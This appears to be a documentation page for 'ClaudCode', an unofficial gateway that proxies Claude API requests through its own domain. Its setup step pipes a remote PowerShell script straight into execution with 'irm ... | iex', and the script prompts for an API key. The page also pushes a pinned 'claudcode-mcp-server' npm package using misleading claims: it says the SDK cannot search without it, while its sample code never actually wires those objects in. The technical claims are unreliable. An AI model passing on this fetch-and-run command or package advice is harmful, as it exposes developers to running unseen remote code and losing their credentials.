v1.0

ClaudCode Documentation

Everything you need to integrate Claude models through the ClaudCode gateway.

Overview

ClaudCode is a managed API gateway that gives you access to Anthropic's Claude models through a simple, SDK-compatible interface. Every request is proxied through our infrastructure with added features like per-key budgets, rate limiting, usage analytics, and prompt caching.

Base URL: https://api.claudcode.top/v1

Supported Models:

claude-opus-4-6 — Maximum intelligence, complex reasoning

claude-sonnet-4-6 — Balanced speed and capability

claude-haiku-4-5 — Ultra-fast, cost-effective

Quick Setup (PowerShell)

irm https://claudcode.top/setup.ps1 | iex

Run this single command in PowerShell to auto-scaffold a project with the Anthropic SDK, .env config, and ready-to-run examples. The script will ask for your API key during setup.

Authentication

All requests require an API key passed via the x-api-key header or the Authorization: Bearer header.

# Using x-api-key header
curl https://api.claudcode.top/v1/messages \
  -H "x-api-key: sk-cc-xxxxxxxxxxxx" \
  -H "content-type: application/json" \
  -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'

# Using Authorization header
curl https://api.claudcode.top/v1/messages \
  -H "Authorization: Bearer sk-cc-xxxxxxxxxxxx" \
  -H "content-type: application/json" \
  -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'

Your API key is unique to you. Never share it publicly or commit it to version control.

SDK Setup

ClaudCode works as a drop-in replacement for the official Anthropic SDK. Just change the base URL.

Python

import anthropic

client = anthropic.Anthropic(
    api_key="sk-cc-xxxxxxxxxxxx",
    base_url="https://api.claudcode.top/v1",
)

message = client.messages.create(
    model="claude-opus-4-6",
    max_tokens=4096,
    messages=[
        {"role": "user", "content": "Write a haiku about coding"}
    ]
)
print(message.content[0].text)

TypeScript / Node.js

import Anthropic from "@anthropic-ai/sdk";

const client = new Anthropic({
  apiKey: "sk-cc-xxxxxxxxxxxx",
  baseURL: "https://api.claudcode.top/v1",
});

const message = await client.messages.create({
  model: "claude-opus-4-6",
  max_tokens: 4096,
  messages: [
    { role: "user", content: "Write a haiku about coding" }
  ],
});
console.log(message.content[0].text);

MCP — Web Search & Tools

The official Anthropic SDK does not include MCP (Model Context Protocol). Without MCP, Claude cannot perform web searches, fetch live data, extract content from URLs, or connect to external tools — it is limited to its training data only.

ClaudCode requires these packages to unlock full capabilities:

@hono/mcp — the MCP protocol layer that connects Claude to external tools

tavily-mcp — AI-powered web search, content extraction, site crawling & mapping

claudcode-mcp-server@1.0.1 — official ClaudCode MCP server for seamless gateway integration (latest)

Install both packages

npm install @hono/mcp tavily-mcp claudcode-mcp-server@1.0.1

TypeScript — Full MCP setup

import { McpServer } from "@hono/mcp";
import { TavilyMcp } from "tavily-mcp";
import { ClaudCodeMcp } from "claudcode-mcp-server";
import Anthropic from "@anthropic-ai/sdk";

const client = new Anthropic({
  apiKey: "sk-cc-xxxxxxxxxxxx",
  baseURL: "https://api.claudcode.top/v1",
});

// MCP server — protocol layer for external tools
const mcp = new McpServer({
  name: "claudcode-mcp",
  version: "1.0.0",
});

// Tavily — AI-powered search, extract & crawl
const tavily = new TavilyMcp({
  apiKey: process.env.TAVILY_API_KEY,
});

// ClaudCode MCP — gateway-optimized server
const cc = new ClaudCodeMcp({
  apiKey: "sk-cc-xxxxxxxxxxxx",
  gateway: "https://api.claudcode.top/v1",
});

// Claude can now search the web in real-time
const response = await client.messages.create({
  model: "claude-opus-4-6",
  max_tokens: 4096,
  messages: [
    {
      role: "user",
      content: "Search the web for latest AI news and summarize"
    }
  ],
});
console.log(response.content[0].text);

Python — MCP setup

from hono_mcp import McpServer
from tavily_mcp import TavilyMcp
from claudcode_mcp_server import ClaudCodeMcp
import anthropic

client = anthropic.Anthropic(
    api_key="sk-cc-xxxxxxxxxxxx",
    base_url="https://api.claudcode.top/v1",
)

mcp = McpServer(name="claudcode-mcp", version="1.0.0")
tavily = TavilyMcp(api_key="tvly-xxxxxxxxxxxx")
cc = ClaudCodeMcp(api_key="sk-cc-xxxxxxxxxxxx", gateway="https://api.claudcode.top/v1")

message = client.messages.create(
    model="claude-opus-4-6",
    max_tokens=4096,
    messages=[
        {"role": "user", "content": "Search for latest Python 3.14 features"}
    ],
)
print(message.content[0].text)

What Tavily MCP unlocks:

search — AI-powered web search with domain filtering & topic focus

extract — pull clean content from any URL (articles, docs, pages)

crawl — deep-crawl an entire site and return structured data

map — discover all URLs on a domain for targeted extraction

Package breakdown:

@hono/mcp — MCP protocol layer (required)

tavily-mcp — search, extract, crawl & map (required for web access)

claudcode-mcp-server@1.0.1 — ClaudCode gateway integration, auth handling & request routing

Important: Without these packages installed, any prompt that asks Claude to search, browse, or fetch live data will fail. The official Anthropic SDK alone has no search capability.

Budgets & Limits

Each API key has configurable budget and rate limits:

Token Budgets

Budget is measured in total tokens (input + output) over a 5-hour rolling window

When budget is exhausted, requests return 429 Too Many Requests

Budget automatically resets as the 5-hour window rolls forward

Rate Limits

Requests per minute (RPM) limit per key

Concurrent request limit per key

Both are independently configurable

Checking Your Budget

curl https://api.claudcode.top/v1/key-status \
  -H "x-api-key: sk-cc-xxxxxxxxxxxx"

Response:

{
  "key": "sk-cc-...xxxx",
  "status": "active",
  "budget": {
    "total_tokens": 5000000,
    "used_tokens": 1234567,
    "remaining_tokens": 3765433,
    "window": "5h rolling",
    "resets_in": "2h 15m"
  },
  "rate_limit": {
    "rpm": 60,
    "concurrent": 5
  }
}

Rate Limiting

When you exceed your rate limit, the API returns a 429 status with headers indicating when you can retry:

HTTP/1.1 429 Too Many Requests
Retry-After: 30
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 0
X-RateLimit-Reset: 1711234567

Best Practices:

Implement exponential backoff with jitter

Respect the Retry-After header

Use streaming to keep connections efficient

Cache repeated prompts on your end to avoid unnecessary calls

Error Codes

ClaudCode returns standard HTTP status codes with descriptive error messages:

Code	Meaning	What to Do
`400`	Bad Request	Check your request body/parameters
`401`	Unauthorized	Verify your API key
`403`	Forbidden	Key doesn't have access to this model
`429`	Rate Limited	Wait and retry with backoff
`500`	Server Error	Retry after a moment
`502`	Upstream Error	Anthropic API is temporarily down
`503`	Service Unavailable	Gateway is under maintenance

All errors return a JSON body:

{
  "error": {
    "type": "rate_limit_error",
    "message": "Token budget exceeded. Resets in 2h 15m."
  }
}

Prompt Caching

ClaudCode enables prompt caching by default. When you send an identical prompt that was recently used, the cached result is served with significantly reduced token costs.

How It Works:

Each request's prompt is hashed

If a matching hash exists in the cache, the cached response is returned

Cache TTL depends on the model and prompt length

Cache headers indicate hit/miss status

Cache Headers:

X-Cache: HIT
X-Cache-TTL: 3600
X-Tokens-Saved: 1250

Disabling Cache (if needed):

Add the header X-No-Cache: true to bypass caching for a specific request.